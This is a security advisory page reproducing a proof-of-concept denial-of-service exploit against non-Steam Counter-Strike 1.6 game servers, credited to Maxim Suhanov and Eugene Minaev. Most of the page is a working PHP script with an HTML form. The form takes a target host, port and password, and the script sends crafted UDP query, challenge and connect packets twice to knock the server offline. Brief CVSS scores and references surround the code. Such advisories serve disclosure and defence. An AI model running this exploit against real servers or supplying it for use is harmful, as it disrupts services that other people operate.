Half-Life CSTRIKE Server 1.6 Denial of Service Exploit (no-steam)

2009-09-15 / 2009-09-16
Credit: Maxim Suhanov
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

----[ Counter Strike 1.6 Denial Of Service POC ... ITDefence.ru Antichat.ru ] Counter Strike 1.6 Denial Of Service POC Eugene Minaev underwater@itdefence.ru Bug was found by Maxim Suhanov ( THE FUF ) works only with no-steam servers ___________________________________________________________________ ____/ __ __ _______________________ _______ _______________ \ \ \ / .\ / /_// // / \ \/ __ \ /__/ / / / /_// /\ / / / / /___/ \/ / / / / /\ / / / / / \/ / / / / /__ //\ \ / ____________/ / \/ __________// /__ // / /\\ \_______/ \________________/____/ 2007 /_//_/ // //\ \ \\ // // / .\ \\ -[ ITDEFENCE.ru Security advisory ]- // // / . . \_\\________[________________________________________]_________//_//_/ . . <html> <head> <title>Counter Strike DOS POC (underwater@itdefence.ru) </title> <style type="text/css"> input { width: 150px; } td { font-size: 12px; font-family: Verdana, "Trebuchet MS"; text-align: left; } span.err { color: red; } span.ok { color: green; } </style> </head> <body onload="checkpass()"> <div style="width: 210px; margin: auto;"> <form name="csform" method="post" action="cs.php"> <table border="1" align="center" cellpadding="2" cellspacing="0" style="width: 100%;"> <tr> <td style="width: 50px;">Host</td> <td colspan="2"><input name="host" type="text" value=""/></td> </tr> <tr> <td>Port</td> <td colspan="2"><input name="port" type="text" value=""/></td> </tr> <tr> <td>&nbsp;</td> <td><input name="auth" type="checkbox" value="" style="width: 30px;"/></td> <td>Auth Type 2</td> </tr> <tr> <td>Pass</td> <td colspan="2"><input name="pass" type="text" value="" /></td> </tr> <tr> <td>&nbsp;</td> <td colspan="2"><input type="submit" Value="Run"/></td> </tr> </table> <br/> </form> </div> <center>ITDEFENCE / RUSSIA (http://itdefence.ru)<br> </body> </html> <?php /* CS-dos exploit made by underwater Bug was discovered by .FUF Big respect 2 Sax-mmS ( for html ) , Focs ( for his cs server [IMG]http://www.softoplanet.ru/style_emoticons/default/biggrin.gif[/IMG] ) , SkvoznoY , Bug(O)R,Antichat.ru and Cup.su */ ini_set("display_errors","0"); function HELLO_PACKET() { $packet = pack("H*","FFFFFFFF"); $packet .= "TSource Engine Query"; $packet .= pack("H*","00"); return $packet; } function CHALLENGE_PACKET() { $packet = pack("H*","FFFFFFFF"); $packet .= "getchallenge valve"; $packet .= pack("H*","00"); return $packet; } function LOGIN_PACKET_4() { global $cookie; global $password; $packet = pack("H*","FFFFFFFF"); $packet .= "connect 47 "; $packet .= $cookie.' "'; $packet .= '\prot\4\unique\-1\raw\valve\cdkey\d506d189cf551620a70277a3d2c55bb2" "'; $packet .= '\_cl_autowepswitch\1\bottomcolor\6\cl_dlmax\128\cl_lc\1\cl_lw\1\cl_updaterate\30\mod'; $packet .= 'el\gordon\name\Born to be pig (..)\topcolor\30\_vgui_menus\1\_ah\1\rate\3500\*fid\0\pass'; $packet .= 'word\\'.$password; $packet .= pack("H*","220A0000EE02"); return $packet; } function LOGIN_PACKET_2() { global $cookie; global $password; $packet = pack("H*","FFFFFFFF"); $packet .= "connect 47 "; $packet .= $cookie.' "'; $packet .= '\prot\2\raw\d506d189cf551620a70277a3d2c55bb2" "\_cl_autowepswitch\1\bott'; $packet .= 'omcolor\6\cl_dlmax\128\cl_lc\1\cl_lw\1\cl_updaterate\30\model\gordon\nam'; $packet .= 'e\Born to be pig (..)\topcolor\30\_vgui_menus\1\_ah\1\rate\3500\*fid\0\pass'; $packet .= 'word\\'.$password; $packet .= pack("H*","22"); return $packet; } function dowork($host,$port,$password,$auth) { global $password; global $cookie; # connecting to target host $fsock = fsockopen("udp://".$host,(int) $port,$errnum,$errstr,2); if (!$fsock) die ($errstr); else { # sending hello packet fwrite ($fsock,HELLO_PACKET()); fread ($fsock,100); # sending chalennge packet fwrite ($fsock,CHALLENGE_PACKET()); # recieving cookies $resp = fread($fsock,100); # grab cookies from packet $cookie = substr($resp,strpos($resp,"A00000000")+10); $cookie = substr($cookie,0,strpos($cookie," ")); # sending login packet if (!$auth) fwrite ( $fsock,LOGIN_PACKET_4());else fwrite ( $fsock,LOGIN_PACKET_2()); $resp = fread($fsock,100); } } IF (isset($_POST['host']) && isset($_POST['port'])) { IF (empty($_POST['pass'])) $password = "123"; else $password = $_POST['pass']; $fserver = $_POST['host']; $fport = $_POST['port']; if (isset($_POST['auth'])) $fauth = true;else $fauth=false; # we have to connect 2 times $result = dowork($fserver,$fport,$password,$fauth); $result = dowork($fserver,$fport,$password,$fauth); # parsing result echo "Exploit Sent"; } ?> ----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ]

References:

http://xforce.iss.net/xforce/xfdb/39535
http://www.securityfocus.com/bid/27159
http://www.milw0rm.com/exploits/4856


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top